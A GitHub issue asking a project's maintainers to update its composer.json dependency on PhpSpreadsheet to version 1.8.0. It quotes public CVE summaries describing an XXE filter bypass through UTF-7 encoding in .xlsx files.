Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Could you please update your composer.json file? #41

Open
gammaire opened this issue Jan 23, 2020 · 0 comments
Open

Could you please update your composer.json file? #41

gammaire opened this issue Jan 23, 2020 · 0 comments

Comments

@gammaire
Copy link

The dependency requirement is not updated and contains a potential vulnerability, as per below. Please update dependency to: "phpoffice/phpspreadsheet": "1.8.0"
Thanks.

CVE-2019-12331
moderate severity
Vulnerable versions: < 1.8.0
Patched version: 1.8.0
PHPOffice PhpSpreadsheet before 1.8.0 has an XXE issue. The XmlScanner decodes the sheet1.xml from an .xlsx to utf-8 if something else than UTF-8 is declared in the header. This was a security measurement to prevent CVE-2018-19277 but the fix is not sufficient. By double-encoding the the xml payload to utf-7 it is possible to bypass the check for the string ?<!ENTITY? and thus allowing for an xml external entity processing (XXE) attack.

CVE-2018-19277
high severity
Vulnerable versions: < 1.5.0
Patched version: 1.5.0
securityScan() in PHPOffice PhpSpreadsheet through 1.5.0 allows a bypass of protection mechanisms for XXE via UTF-7 encoding in a .xlsx file
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@gammaire